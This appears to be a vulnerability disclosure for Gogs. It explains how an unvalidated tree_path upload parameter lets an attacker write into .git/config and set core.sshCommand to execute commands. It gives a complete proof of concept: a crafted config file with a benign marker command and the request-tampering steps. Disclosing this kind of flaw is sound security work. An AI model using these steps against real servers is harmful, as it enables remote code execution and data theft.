When uploading a file to the repository in Gogs, the tree_path
parameter is not been validated. The attacker can set tree_path=/.git/
to upload file into the .git
directory.
Rewrite .git/config
file and set core.sshCommand
, which leads to remote command execution vulnerability.
Create a repository in Gogs, upload a file config
to the repository on the web page:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
url = [email protected]:torvalds/linux.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Intercept the HTTP POST form submitting request, and set parameter to tree_path=/.git/
in request body.
Then a file with text pwnned
is created in /tmp/poc
.
This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.